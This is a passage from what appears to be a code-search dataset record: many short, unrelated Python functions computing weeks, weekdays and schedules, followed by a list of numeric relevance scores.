option == 'pre':\n usePre = True\n \n if optweek:\n if optweek == \"next\":\n useNext = True\n elif optweek.isdigit():\n if usePre: \n if 1 <= int(optweek) <= 4:\n outputWeek = \"Preseason Week %s\" % optweek\n else:\n irc.reply(\"ERROR: Preseason week number must be between 1 and 4.\")\n return\n else:\n if 1 <= int(optweek) <= 17:\n outputWeek = \"Week %s\" % optweek\n else:\n irc.reply(\"ERROR: Week must be between 1-17\")\n return \n\n try:\n req = urllib2.Request(url)\n html = (urllib2.urlopen(req)).read()\n except:\n irc.reply(\"Failed to open: %s\" % url)\n return\n \n jsondata = json.loads(html)\n\n week = jsondata.get('week', None) # work with the week data so we know where we are.\n\n if week is None:\n irc.reply(\"Failed to load schedule.\")\n return\n\n currentWeekName = week.get('current', {'current': None}).get('weekName', None) \n nextWeekName = week.get('next', {'next': None}).get('weekName', None) \n\n if currentWeekName is None:\n irc.reply(\"Cannot figure out the current week.\")\n return\n\n games = jsondata.get('content', None) # data in games.\n \n if games is None:\n irc.reply(\"Failed to load the games data.\")\n return\n \n if outputWeek:\n games = [item['games'] for item in games if item['weekName'] == outputWeek]\n weekOutput = outputWeek\n elif useNext:\n games = [item['games'] for item in games if item['weekName'] == nextWeekName]\n weekOutput = nextWeekName\n else:\n games = [item['games'] for item in games if item['weekName'] == currentWeekName]\n weekOutput = currentWeekName\n \n append_list = []\n\n for games in games:\n for t in games:\n awayTeam = self._translateTeam('team', 'nid', t['awayTeamId'])\n homeTeam = self._translateTeam('team', 'nid', t['homeTeamId'])\n append_list.append(\"[\" + t['date']['num'] + \"] \" + awayTeam + \"@\" + homeTeam + \" \" + t['date']['time'])\n \n descstring = string.join([item for item in append_list], \" | \")\n output = \"{0} :: {1}\".format(ircutils.bold(weekOutput), descstring)\n \n irc.reply(output)", "def main():\n print(day_of_week(datetime.now()))\n print(day_of_week(datetime(2019, 7, 4)))\n print(day_of_week(datetime(2013, 12, 25)))\n print(day_of_week(datetime(2000, 1, 1)))", "def ISOWEEKNUM(date):\n return _make_datetime(date).isocalendar()[1]", "def current_week_number(date=datetime.datetime.now()):\n return int(date.strftime(\"%W\"))", "def get_week():\n now = dt.now().date()\n return Week.objects.filter(date__lte=now).order_by('-date').first()", "def day_of_week(self):\n day_of_week_names = ['Monday', 'Tuesday', 'Wednesday', 'Thursday',\n 'Friday', 'Saturday', 'Sunday']\n diff = self.diff(Date(1, 1, 1970)) + 3\n while diff < 0:\n diff += 7\n print(day_of_week_names[diff % 7])", "def CONST_WEEK_TIMESTAMP() -> int:\n return 604800", "def forecast_weekly():\n forecast = get_forecast()\n daily = forecast.daily()\n return daily.summary", "def get_week_frame():\n now = datetime.now()\n\n week_start = now - timedelta(days=now.weekday(),\n hours=now.hour,\n minutes=now.minute,\n seconds=now.second)\n week_end = now + timedelta(days=6 - now.weekday(),\n hours=23 - now.hour,\n minutes=59 - now.minute,\n seconds=59 - now.second)\n\n return week_start, week_end", "def get_week(time_index):\n return np.array(time_index.week).reshape(-1,1)", "def week(update: Update, _: CallbackContext) -> None:\n running_total, average_dose_per_day = return_weekly_figure()\n text = \\\n (\n \"\\n📅 *Rolling 7 Day Stats*\\n\" \n + \"\\n\\t\\t\\t📈 Rolling 7 Day Doses - \" + str('{:,}'.format(running_total))\n + \"\\n\\t\\t\\t💉 Average Daily Doses - \" + str('{:,}'.format(average_dose_per_day)) \n )\n update.message.reply_markdown(text)\n logger.info(\"Getting week update for \" + str(update.message.chat_id))", "def GetWeekNum(self, date):\n (y, m, d) = date.split('-')\n return (dt.date(int(y), int(m), int(d)) - self.START_DATE).days / 7", "def workweeks(yr):\n\n # TODO: MOVE all of this crap into a intelDateTime.py module. Does not belong here. JSS\n\n nyd = datetime.date(yr, 1, 1).weekday() # Determine the day of the week on which the 1st of January fell this year.\n if nyd == 5: return 53 # If the 1st of January fell on a Saturday, the year has 53 weeks.\n if nyd == 4 and isleapyear(yr): return 53 # Same deal if the 1st of January fell on a Friday in a leap year.\n return 52 # All other years have 52 work weeks.", "def get_seven_days_stat(cls):\n return cls.get_specified_days_stat(7)", "def dow(self):\n comparator = Date(11, 12, 2014) # known to be a 'Wednesday'\n DOW = ['Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday', 'Monday', 'Tuesday']\n diff = self.diff(comparator)\n return DOW[diff % 7]", "def day_of_week():\n return calendar.day_name[datetime.date.today().weekday()]", "def day_of_week(self):\n # 1 Jan 0001 was Monday according to the proleptic Gregorian calendar.\n # So, 1 Jan 0001 has ordinal 1, and the weekday is 0.\n return (self._ordinals - 1) % 7", "def get_week_start(x: Optional[Date] = None) -> Date:\n asof = x or get_today()\n return asof - TimeDelta(days=(asof.isoweekday() - 1) % 7)", "def week_days(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"week_days\")", "def _unit_wk(self):\n return ((self.time_base * 60.0) * 24.0) * 7", "def week(self) -> Index:\n warnings.warn(\n \"`week` is deprecated in 3.5.0 and will be removed in 4.0.0.\",\n FutureWarning,\n )\n return Index(self.to_series().dt.week)", "def wkday_on_first(yr, mon): # returns day of week of first of month of the given year (1/1/2016)\r\n TotalDays = 0\r\n for x in range(1754, yr):\r\n YearNum = yeardays(x)\r\n TotalDays += YearNum\r\n for x in range(1, mon):\r\n MonNum = monthdays(yr, x)\r\n TotalDays += MonNum\r\n WhatDayNum = TotalDays % 7\r\n WhatDay = [\"Tues\", \"Wedn\", \"Thu\", \"Fri\", \"Sat\", \"Mon\"]\r\n return WhatDay[WhatDayNum]", "def day_of_week(self) -> str:\n return pulumi.get(self, \"day_of_week\")", "def day_of_week(self) -> str:\n return pulumi.get(self, \"day_of_week\")", "def get_weekday(self):\n originDate = Date(1900, 1, 1)\n return WEEKDAYS[originDate.days_since(self) % 7]", "def weeks_of_the_month(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Union[str, 'WeekNumber']]]]]:\n return pulumi.get(self, \"weeks_of_the_month\")", "def day_of_the_week(arg):", "def current_season_week(sched=None):\n if sched is None or sched.empty:\n sched = schedule()\n td = datetime.datetime.today()\n seas = current_season()\n week_starts = sched.loc[sched.season == seas, :].groupby('week')['gameday'].min()\n this_week = week_starts.loc[week_starts < td].max()\n return week_starts.loc[week_starts == this_week].index.values[0]", "def unit_wk(self):\n return ((self.time_base * 60.0) * 24.0) * 7", "def getWeeks(year):\n url = \"http://www.boxofficemojo.com/weekend/?yr=%d\" % year\n src = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(src, 'html.parser')\n chart = soup.find(border=\"0\", cellspacing=\"1\", cellpadding=\"5\")\n data = parseTable(chart)\n weeks = [int(row[-1]) for row in data[1:]]\n return weeks", "def weeks_of_the_month(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"weeks_of_the_month\")", "def get_weekday(self):\n weekdays = dict(PRODUCT_WEEKDAYS)\n return weekdays.get(self.weekday, \"N/A\")", "def get_week_end(x: Optional[Date] = None) -> Date:\n asof = x or get_today()\n return asof + TimeDelta(days=6 - (asof.isoweekday() - 1) % 7)", "def get_current_week_range(self, currdate):\n dow_start = datetime.datetime.strftime(currdate, '%w')\n if dow_start == '0':\n week_start = currdate\n else:\n week_start = self.get_previous_byday('Sunday', currdate)\n\n week_end = week_start + datetime.timedelta(days=6)\n return (week_start, week_end)", "def current_year_and_week():\n _update_week_number()\n return _cur_year, _cur_week", "def getWeeksToExpire(self):\n cert = self.getLatestValidCertification()\n if cert == None:\n return ''\n date = cert.getValidTo().asdatetime().date();\n return date - date.today()", "def the_week_url():\n return '/timeline/%d/%02d/%d/' % \\\n (datetime.now().year, datetime.now().month, timekit.monthweek(datetime.now()))", "def work_refresh(self):\n now = dt.now()\n self.eisenhower_priority()\n p_week = now.isocalendar()[1] - self.work_datetime.isocalendar()[1]\n\n if (1 <= p_week) and (self.priority not in [1, 2]):\n self.time_ntf = now\n else:\n pass", "def findWeekend(str):\n return int(re.search(\"(?<=wknd=)\\d*\", str)[0])", "def get_time_last_week():\n current_time = arrow.utcnow() # Get the current UTC Time\n return current_time.shift(weeks=-1) # Return the shifted time by -1 weeks", "def news_for_week(self):\n\n raise NotImplementedError", "def GetWeekDay(self):\n if self.day is None:\n if self.week:\n return (\n self.century,\n self.year //\n 10,\n self.year %\n 10,\n self.week,\n None)\n elif self.month is None:\n if self.year is None:\n return (self.century, None, None, None, None)\n else:\n return (\n self.century,\n self.year //\n 10,\n self.year %\n 10,\n None,\n None)\n else:\n raise DateTimeError(\"can't get week day with month precision\")\n else:\n century, year, ordinalDay = self.GetOrdinalDay()\n year += century * 100\n if LeapYear(year):\n yearLength = 366\n else:\n yearLength = 365\n weekday = DayOfWeek(year, self.month, self.day)\n thursday = ordinalDay + 4 - weekday\n if thursday < 1:\n # Thursday this week was actually last year, and so we are\n # part of the last calendar week of last year too.\n # may return year==0\n year -= 1\n week = WeekCount(year)\n elif thursday > yearLength:\n # Thursday this week is actually next year, and so we are\n # part of the first calendar week of next year too.\n # may return century=100\n year += 1\n week = 1\n else:\n # We are part of this year, but which week?\t Jan 4th is always\n # part of the first week of the year, so we calculate the ordinal\n # value of the Monay that began that week\n yearBase = 5 - DayOfWeek(year, 1, 4)\n week = (ordinalDay - yearBase) // 7 + 1\n return year // 100, (year % 100) // 10, (year % 10), week, weekday", "def week_index(self) -> pulumi.Input[Union[str, 'Type']]:\n return pulumi.get(self, \"week_index\")", "def day_of_week(dt):\n cday = dt\n mday = 2\n uday = cday.isocalendar()[2] + mday\n try:\n if uday > 7:\n CURRDAY = uday - 7\n log.debug(\"1;EME;RUNNING;000;Scheduler.py;Setting customized day of week>7 : \", CURRDAY)\n else:\n CURRDAY = uday\n log.debug(\"1;EME;RUNNING;000;Scheduler.py;Setting customized day of week : \", CURRDAY)\n return CURRDAY\n except Exception as e:\n log.exception(\"1;EME;FAILURE;700;SCHEDULE ERROR \" + str(e), exc_info=False)\n sys.exit(0)", "def next_seven_day(self):\n today = datetime.date.today()\n week_next = today + datetime.timedelta(days=7)\n return week_next.strftime('%Y-%m-%d')", "def day_of_week(self) -> str:\n return self.elements[4]", "def test_date_accept_last_week(self):\n spi_search = \"find date last week\"\n inv_search = \"year:\" + datetime.datetime.strftime(datetime.datetime.today()\\\n +dateutil.relativedelta.relativedelta(days=-(7+(datetime.datetime.today().isoweekday()%7))), '%Y-%m-%d')\n self._compare_searches(inv_search, spi_search)", "def gen_weeklyFrequency(self):\n\n if len(self.fields) == 0:\n return None\n\n if self.validator.validate(self.fields) == False:\n return None\n\n weeklyFrequency = 0\n dayFields = ['day1','day2','day3','day4','day5','day6','day7']\n for dayField in dayFields:\n if dayField in self.fields:\n if self.fields[dayField] == True:\n weeklyFrequency += 1\n\n return weeklyFrequency", "def _getWeeklyPlayHours(self):\n serverRegionalSettings = BigWorld.player().serverSettings['regional_settings']\n weekDaysCount = account_shared.currentWeekPlayDaysCount(time_utils._g_instance.serverUTCTime, serverRegionalSettings['starting_time_of_a_new_day'], serverRegionalSettings['starting_day_of_a_new_week'])\n return self._getDailyPlayHours() + sum(self.__stats.dailyPlayHours[1:weekDaysCount])", "def get_week_days(year, week):\n d = dt.date(year, 1, 1)\n if(d.weekday() > 3):\n d = d + dt.timedelta(7 - d.weekday())\n else:\n d = d - dt.timedelta(d.weekday())\n dlt = dt.timedelta(days = (week - 1) * 7)\n return d + dlt #, d + dlt + dt.timedelta(days = 6)", "def weekday(self):\n return (self.toordinal() + 6) % 7", "def day_of_week(self) -> pulumi.Input[Union[str, 'WeekDay']]:\n return pulumi.get(self, \"day_of_week\")", "def day_of_week(self) -> pulumi.Input[Union[str, 'WeekDay']]:\n return pulumi.get(self, \"day_of_week\")", "def get_first_day_of_the_week(self):\n if SubscriptionProduct.objects.filter(\n subscription=self, product__weekday=1\n ).exists():\n return 1\n elif SubscriptionProduct.objects.filter(\n subscription=self, product__weekday=2\n ).exists():\n return 2\n elif SubscriptionProduct.objects.filter(\n subscription=self, product__weekday=3\n ).exists():\n return 3\n elif SubscriptionProduct.objects.filter(\n subscription=self, product__weekday=4\n ).exists():\n return 4\n elif SubscriptionProduct.objects.filter(\n subscription=self, product__weekday=5\n ).exists():\n return 5\n else:\n return 6", "def get_day_of_week() -> str:\n return datetime.now(pytz.timezone('US/Eastern')).strftime(\"%a\").lower()", "def ISOWEEKNUM(\n date: func_xltypes.XlDateTime\n) -> func_xltypes.XlNumber:\n\n datetime_date = utils.number_to_datetime(int(date))\n isoweeknum = datetime_date.isocalendar()[1]\n return isoweeknum", "def monday_last_week():\n today = datetime.date.today()\n last_week = today - datetime.timedelta(days=7)\n return last_week - datetime.timedelta(days=(last_week.isoweekday() - 1))", "def test_date_accept_this_week(self):\n spi_search = \"find date this week\"\n inv_search = \"year:\" + datetime.datetime.strftime(datetime.datetime.today()\\\n +dateutil.relativedelta.relativedelta(days=-(datetime.datetime.today().isoweekday()%7)), '%Y-%m-%d')\n self._compare_searches(inv_search, spi_search)", "def weekPay(self):\n pay = self.hourlyPay * self.hoursWorked\n return pay", "def get_rollover_weeks(shop):\n d = {}\n ods, r = get_rollovers(shop)\n\n for od in ods:\n week = int(od.eta.strftime('%W'))+1\n if d.has_key(week):\n d[week] += int(od.plan)\n else:\n d[week] = int(od.plan)\n\n # remove the pulled from this week\n this_week = int(datetime.datetime.today().strftime('%W'))+1 \n if d.has_key(this_week):\n d[this_week] = d[this_week] - get_pulled(shop)[1] \n\n # build the return list of (week, '00:00') tuples\n l = []\n d = sorted(d.items()) # sort dictionary by week\n for key, minutes in d:\n formatted_time = _get_display_hours(minutes)\n l.append((key,formatted_time))\n\n return l", "def current_season_phase():\n _update_week_number()\n return _cur_season_phase", "def get_weekday_number(date):\n return date.strftime('%w')", "def weekend_start(self) -> int:\n return self._data['week_data']['weekend_start']", "def interval_weeks(self) -> pulumi.Input[int]:\n return pulumi.get(self, \"interval_weeks\")", "def get_weekday():\n result = datetime.today().weekday() + 1\n return result", "def test_weeks(self):\n d = datetime(2014, 1, 29)\n eq_(week_start(d), datetime(2014, 1, 27, 0, 0, 0))\n eq_(week_end(d), datetime(2014, 2, 2, 23, 59, 59))", "def get_week_from_date(date) -> int:\n month, year = date.month, date.year\n if month < 4:\n year -= 1\n ld = _labor_day(year)\n wk1_wed = ld + timedelta(days=2)\n days_since = (date - wk1_wed).days\n weeks_since = days_since / 7.\n week = math.floor(weeks_since) + 1\n return int(week)", "def days_of_the_week(self) -> Optional[Sequence[str]]:\n return pulumi.get(self, \"days_of_the_week\")", "def weekday(self):\n return 0", "def weekday(self):\n return 0", "def _DayNumToWeekdayNum(daynum):\n return (daynum + _WEEKDAY_BASE) % NUM_WEEKDAYS", "def get_next_weekend():\n d = datetime.date.today()\n # day 5 for saturday\n t = datetime.timedelta((7 + 5 - d.weekday()) % 7)\n return (d + t).strftime('%d-%m-%Y')", "def get_7d(self):\n records = self.level_model.get_for_period(7)\n self.set_attributes(records, '7 days')", "def get_week_date(self, raw_week: str) -> tuple:\n\n search_result = re.search(r'^(\\d+.\\d+)\\s+-\\s+\\d+.\\d+', raw_week)\n\n if \"from\" in raw_week:\n week = re.sub(r'^\\D+', '', raw_week)\n\n elif search_result:\n week = search_result.group(1)\n else:\n week = \"{}.{}\".format(current_day, current_month)\n\n week_in_date_format_1900 = datetime.datetime.strptime(week, \"%d.%m\")\n currect_week = week_in_date_format_1900.replace(current_year)\n\n return currect_week.isoformat(), currect_week.isocalendar()[1]", "def get_this_week_label(self):\n return gettext_lazy('This week')", "def get_week(date):\n\n # TODO: the API seems broken. It returns week, year not year, week as documentef\n # why not use date.isocalendar() from the stdlib?\n\n date = date_trunc('week', date)\n\n first_monday = date_trunc('week', date_trunc('year', date))\n if first_monday.year < date.year:\n first_monday += datetime.timedelta(weeks=1)\n diff = date_trunc('day', date) - first_monday\n week = 1 + (diff.days / 7)\n return week, first_monday.year", "def schedule_url(year, stype, week):\n xmlurl = 'http://www.nfl.com/ajax/scorestrip?'\n if stype == 'POST':\n week += 17\n if week == 21: # NFL.com you so silly\n week += 1\n return '%sseason=%s&seasonType=%s&week=%s' % (xmlurl, year, stype, week)", "def return_weekly_figure():\n today = datetime.datetime.now()\n\n while 1:\n try:\n today_str = str(today.day) + \"/\" + \"{:02d}\".format(today.month) + \"/\" + str(today.year)\n match = covid_table.find(date=today_str)\n match.next()\n running_total = 0\n for i in range(7):\n running_total += return_daily_figure(today)\n today = today - datetime.timedelta(days=1)\n average_dose_per_day = round(running_total/7)\n return running_total, average_dose_per_day \n except:\n today = today - datetime.timedelta(days=1)", "def GetListOfWeeks(self):\n delta_days = (self.GetFridayOfLastFullWeek() - self.START_DATE).days\n delta_weeks = int(math.floor(delta_days / 7))\n weeks = [self.START_DATE + dt.timedelta(days=7 * x) \n for x in range(0, delta_weeks + 1)]\n weeks = [week.strftime('%Y-%m-%d') for week in weeks]\n self.cursor.execute(\n 'SELECT DISTINCT week FROM %s' % self.BOX_OFFICE_TABLE)\n weeks_in_table = [x[0] for x in self.cursor.fetchall()]\n weeks = list(set(weeks) - set(weeks_in_table))\n weeks.sort() \n return weeks", "def getnextrunningdate(jsondata):\n\n returneddata = json.loads(jsondata)\n days = {}\n\n if returneddata[\"response_code\"]==200:\n trainData = returneddata[\"train\"]\n daysData = trainData[\"days\"]\n if daysData:\n for day in trainData[\"days\"]:\n days[day[\"day-code\"]]=day[\"runs\"]\n\n today = datetime.date.today()\n nextweekday = (today + datetime.timedelta(days=7))\n\n for i in range(len(days)):\n runningdate = (nextweekday + datetime.timedelta(days=i))\n if models.istrainrunningonjourneydate(days, runningdate):\n return runningdate\n\n return nextweekday", "def get_player_stats_from_game(team, year, week):", "def __init__(self, y, w):\n for d in xrange(-10, 370):\n date = datetime.date(y, 1, 1) + datetime.timedelta(d)\n if date.isocalendar() == (y, w, 1):\n date_a = date\n break\n else:\n raise ValueError(\"Invalid week\")\n date_b = date_a + datetime.timedelta(7)\n super(Week, self).__init__(date_a, date_b)", "def WeekdayNum(name):\n return _WEEKDAY_DICT.get(name.capitalize(), 0)", "def week_number(self, bot, update):\n bot.send_message(update.message.chat_id,\n text='Сейчас *{}* учебная неделя.'.format(self.week()),\n parse_mode='Markdown')", "def get_week_range(year, week):\n first_day = datetime.strptime(f\"{year}-W{week}-1\", \"%Y-W%W-%w\").date()\n last_day = first_day + timedelta(days=6)\n return first_day, last_day", "def twenty_seventeen():\n return 2017", "def _next_week(self) -> datetime.datetime:\n now = datetime.datetime.now()\n for i in range(7):\n yield now + datetime.timedelta(i)", "def weekday(self):\n\n return func.extract('dow', self.start_date) + 1", "def what_night_is_it():\n d = datetime.datetime.utcnow() - datetime.timedelta(7 / 24 + 0.5)\n tonight = int(d.strftime('%Y%m%d'))\n return tonight" ]
[ "0.7158167", "0.71226656", "0.7076009", "0.6954984", "0.6877098", "0.6862873", "0.6779078", "0.67491233", "0.66814524", "0.66672885", "0.6630186", "0.66270226", "0.642512", "0.6424101", "0.64128476", "0.6316389", "0.6287629", "0.62338805", "0.62046766", "0.61931086", "0.61917317", "0.61785275", "0.6157817", "0.615032", "0.6119349", "0.6082831", "0.60824424", "0.60644966", "0.6026524", "0.6013661", "0.6007349", "0.60035205", "0.5996054", "0.5974118", "0.5974118", "0.597303", "0.5959178", "0.59562635", "0.59395754", "0.5931542", "0.59278584", "0.59223914", "0.59065086", "0.59048986", "0.5903823", "0.5897497", "0.5884456", "0.58825433", "0.5862913", "0.5845439", "0.5837026", "0.5832195", "0.58313364", "0.583086", "0.582578", "0.5821544", "0.5819251", "0.5808768", "0.5805686", "0.5797578", "0.5760096", "0.5755152", "0.5748477", "0.5748477", "0.5726687", "0.5699749", "0.5688215", "0.56844074", "0.5659063", "0.565614", "0.5655345", "0.5653469", "0.56496656", "0.5635579", "0.56206936", "0.56123", "0.5603281", "0.5581931", "0.55808145", "0.5573596", "0.5573596", "0.55733633", "0.55688834", "0.55655086", "0.5559461", "0.5548173", "0.55454504", "0.5533239", "0.55183434", "0.5506755", "0.550486", "0.5485498", "0.54807687", "0.54727", "0.5459973", "0.5459492", "0.54549944", "0.5450684", "0.54357785", "0.5434279" ]
0.6960671
3
Find list of edl directories in all dependencies for the passed module
def get_edl_dirs(mod, gen_cfg): log.info("Fetching dependencies for %s", coordinates.as_path(mod.coords)) dependencies = mod.get_dependencies() edl_dirs = [mod.get_edl_path()] for dep, dep_coords in dependencies.items(): dep_cfg = gen_cfg.get_mod_cfg(dep) log.info("Dependency: %s", coordinates.as_path(dep_coords)) dep_edl_path = os.path.join(mod.mirror_root, coordinates.as_path(dep_coords, False)[1:], dep_coords.version, dep_cfg.edl_dir) edl_dirs.append(dep_edl_path) return edl_dirs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _compute_module_search_path(self, pkg_name):\n pkg_location = self.get_package_location(pkg_name)\n module_search_path = [pkg_location, os.path.join(pkg_location,'lib')]\n st, cycle = graph.dfs(self.package_dependency, pkg_name)\n # computed packages on which this task depends\n required_pkgs = [self.get_package_location(x) for x in \\\n st.keys() if st[x] is not None]\n module_search_path += required_pkgs\n module_search_path += [os.path.join(x, 'lib') for x in required_pkgs]\n return module_search_path, cycle", "def getModules() -> tuple:\n return data.getFoldersOf(data.ETC)", "def library_dirs(self):", "def modules():\n return [os.path.relpath(os.path.join(root, filename), 'groot_ansible')\n for root, _, filenames in os.walk('groot_ansible/playbooks/library') for filename in filenames if '.git' not in root.split(os.sep)\n ]", "def __dir__():\n return __all__", "def find_package_data(module, path):\n files = []\n exclude = re.compile(\"\\.pyc$|~$\")\n for dirpath, dirnames, filenames in os.walk(os.path.join(module,path)):\n for filename in filenames:\n if not exclude.search(filename):\n files.append(os.path.relpath(os.path.join(dirpath,filename),module))\n return {module:files}", "def dcs_modules():\n\n dcs_dirname = os.path.dirname(__file__)\n module_prefix = __package__ + '.'\n\n if getattr(sys, 'frozen', False):\n importer = pkgutil.get_importer(dcs_dirname)\n return [module for module in list(importer.toc) if module.startswith(module_prefix) and module.count('.') == 2]\n else:\n return [module_prefix + name for _, name, is_pkg in pkgutil.iter_modules([dcs_dirname]) if not is_pkg]", "def __dir__():\n keys = (*globals().keys(), *_lazy_imports_obj.keys(), *_lazy_imports_mod.keys())\n return sorted(keys)", "def dependency_dir(self) -> Path:", "def include_dirs(self):", "def getDepList(self, dict):\n \n if( dict.has_key( self.name) ):\n return\n else:\n dict[ self.name ] = self.installPath\n\n if( len( dict ) > 1 ):\n mods = self.reqmodules + self.optmodules\n else:\n mods = self.reqmodules + self.optmodules + self.reqmodules_buildonly\n \n for modname in mods:\n if( self.parent.module(modname) != None ):\n self.parent.module(modname).getDepList( dict )", "def find_enstools_packages():\n\n return [f'enstools.{p}' for p in (find_packages(f'{os.path.dirname(__file__)}/enstools'))]", "def library_search_path(self, pedantic=False):\n return []", "def listConfigModules(etcdir):\n if not os.path.isdir(etcdir):\n return iter(())\n return (name for name in os.listdir(etcdir)\n if (name.endswith('.py')\n and os.path.isfile(os.path.join(etcdir, name)))\n )", "def lib_dirs(self):\r\n ret = []\r\n for x in [y.type for y in self.variables] + [\r\n y.op for y in self.node_order]:\r\n try:\r\n ret += x.c_lib_dirs()\r\n except utils.MethodNotDefined:\r\n pass\r\n return utils.uniq(ret)", "def list_modules():\n for module_name in listdir(modules_directory):\n if isdir(join(modules_directory, module_name)):\n log.debug('Load module: {0}'.format(module_name))\n yield module_name", "def find_modules(x):\n return Path(x).rglob('*.py')", "def find_with_deps(self, package_names):", "def get_dep_map(kerneldir):\n\n\tf = open(os.path.join(kerneldir, 'modules.dep'))\n\tdeps = {}\n\tfor l in f:\n\t\t#print repr(l)\n\t\tmod, dep_list_str = l.strip().split(':', 1)\n\t\tassert mod not in deps\n\n\t\tkmod = KModuleName(mod)\n\t\tdep_list = [KModuleName(x) for x in dep_list_str.strip().split()]\n\t\tdep_list.insert(0, kmod)\t# prepend ourself as a dependency\n\n\t\tdeps[kmod] = dep_list\n\n\tf.close()\n\treturn deps", "def my_find_packages(*args):\n import os\n packages = []\n for root_module_dir in args:\n for root, dirs, files in os.walk(root_module_dir):\n if '__init__.py' in files:\n packages.append(root)\n return packages", "def find_dependent_modules():\n tree = {}\n for module in sys.modules.values():\n if module is None:\n continue\n tree[module] = set()\n for attr_name in dir(module):\n attr = getattr(module, attr_name)\n if isinstance(attr, ModuleType):\n tree[module].add(attr)\n elif type(attr) in (FunctionType, type):\n tree[module].add(attr.__module__)\n return tree", "def _scan_fortran_file_deps(src: Path, srcdir: Path, dirname: Path, tdeps, compiler) -> T.List[str]:\n\n incre = re.compile(FORTRAN_INCLUDE_PAT, re.IGNORECASE)\n usere = re.compile(FORTRAN_USE_PAT, re.IGNORECASE)\n submodre = re.compile(FORTRAN_SUBMOD_PAT, re.IGNORECASE)\n\n mod_files = []\n src = Path(src)\n with src.open(encoding='ascii', errors='ignore') as f:\n for line in f:\n # included files\n incmatch = incre.match(line)\n if incmatch is not None:\n incfile = src.parent / incmatch.group(1)\n # NOTE: src.parent is most general, in particular for CMake subproject with Fortran file\n # having an `include 'foo.f'` statement.\n if incfile.suffix.lower()[1:] in compiler.file_suffixes:\n mod_files.extend(_scan_fortran_file_deps(incfile, srcdir, dirname, tdeps, compiler))\n # modules\n usematch = usere.match(line)\n if usematch is not None:\n usename = usematch.group(1).lower()\n if usename == 'intrinsic': # this keeps the regex simpler\n continue\n if usename not in tdeps:\n # The module is not provided by any source file. This\n # is due to:\n # a) missing file/typo/etc\n # b) using a module provided by the compiler, such as\n # OpenMP\n # There's no easy way to tell which is which (that I\n # know of) so just ignore this and go on. Ideally we\n # would print a warning message to the user but this is\n # a common occurrence, which would lead to lots of\n # distracting noise.\n continue\n srcfile = srcdir / tdeps[usename].fname\n if not srcfile.is_file():\n if srcfile.name != src.name: # generated source file\n pass\n else: # subproject\n continue\n elif srcfile.samefile(src): # self-reference\n continue\n\n mod_name = compiler.module_name_to_filename(usename)\n mod_files.append(str(dirname / mod_name))\n else: # submodules\n submodmatch = submodre.match(line)\n if submodmatch is not None:\n parents = submodmatch.group(1).lower().split(':')\n assert len(parents) in {1, 2}, (\n 'submodule ancestry must be specified as'\n f' ancestor:parent but Meson found {parents}')\n\n ancestor_child = '_'.join(parents)\n if ancestor_child not in tdeps:\n raise MesonException(\"submodule {} relies on ancestor module {} that was not found.\".format(submodmatch.group(2).lower(), ancestor_child.split('_', maxsplit=1)[0]))\n submodsrcfile = srcdir / tdeps[ancestor_child].fname\n if not submodsrcfile.is_file():\n if submodsrcfile.name != src.name: # generated source file\n pass\n else: # subproject\n continue\n elif submodsrcfile.samefile(src): # self-reference\n continue\n mod_name = compiler.module_name_to_filename(ancestor_child)\n mod_files.append(str(dirname / mod_name))\n return mod_files", "def getExtraDlls(self, module):\n\n full_name = module.getFullName()\n\n if full_name == \"kivy\":\n kivy_info = self._getKivyInformation()\n\n kivy_dlls = []\n for dll_folder in kivy_info.sdl2_dep_bins + kivy_info.glew_dep_bins:\n kivy_dlls.extend(self.locateDLLsInDirectory(dll_folder))\n\n for full_path, target_filename, _dll_extension in kivy_dlls:\n yield self.makeDllEntryPoint(\n source_path=full_path,\n dest_path=target_filename,\n package_name=full_name,\n reason=\"needed by 'kivy'\",\n )\n\n self.reportFileCount(full_name, len(kivy_dlls))", "def __dir__():\n import pkgutil\n\n names = [\n name\n for importer, name, ispkg in pkgutil.iter_modules(__path__)\n if not ispkg and name != \"base\"\n ]\n return names + [\"custom\", \"noData\"]", "def moduleList(path):\n\n if os.path.isdir(path):\n folder_list = os.listdir(path)\n elif path.endswith('.egg'):\n try:\n folder_list = [f for f in zipimporter(path)._files]\n except:\n folder_list = []\n else:\n folder_list = []\n #folder_list = glob.glob(os.path.join(path,'*'))\n folder_list = [p for p in folder_list \\\n if os.path.exists(os.path.join(path, p,'__init__.py'))\\\n or p[-3:] in ('.py','.so')\\\n or p[-4:] in ('.pyc','.pyo','.pyd')]\n\n folder_list = [os.path.basename(p).split('.')[0] for p in folder_list]\n return folder_list", "def get_modules(self):\n return self._module_loader.filelist", "def test_get_leaf_modules(request):\n filename = request.module.__file__\n qalgebra_dir = os.path.join(\n os.path.split(filename)[0], '..', 'src', 'qalgebra'\n )\n modules = get_leaf_modules(qalgebra_dir)\n assert \"qalgebra.core.abstract_algebra\" in modules", "def __dir__(self):\n result = list(new_module.__all__)\n result.extend(('__file__', '__path__', '__doc__', '__all__',\n '__docformat__', '__name__', '__path__',\n '__package__', '__version__'))\n return result", "def find_all_test_files():\n #test_file_pattern = re.compile('^t(est)?_.*\\.py$')\n test_file_pattern = re.compile('.*_test\\.py$')\n is_test_file = lambda filename: test_file_pattern.match(filename)\n drop_dot_py = lambda filename: filename[:-3]\n join_module = lambda *names: '/'.join(names)\n\n modules = []\n for root, dirs, files in os.walk(os.curdir):\n root_name = os.path.split(root)[-1]\n for test_file in filter(is_test_file, files):\n module = join_module(root_name, drop_dot_py(test_file))\n modules.append(module)\n #modules += ['.'.join([root_name, drop_dot_py(test_file)]) for test_file in filter(is_test, files)]\n return modules", "def freeze_includes() -> List[str]:\n import _pytest\n\n result = list(_iter_all_modules(_pytest))\n return result", "def demo_paths(self):\n base_path = os.path.join(self.module.__path__[0], 'demo')\n paths = []\n if os.path.isdir(base_path):\n for item in os.listdir(base_path):\n # TODO: support examples which is not auto-loaded\n if not os.path.isdir(os.path.join(base_path, 'examples')):\n paths.append(os.path.join(base_path, item))\n return paths", "def modules():", "def library_directories(self):\n\n status, stdout, stderr = self.__xcall__(['--libs-only-L'])\n\n if status != 0:\n raise RuntimeError(\"error querying --libs-only-L for package `%s': %s\" % (self.name, stderr))\n\n retval = []\n for token in stdout.split():\n retval.append(token[2:])\n\n return uniq(retval)", "def __compute_dependencies(self):\n 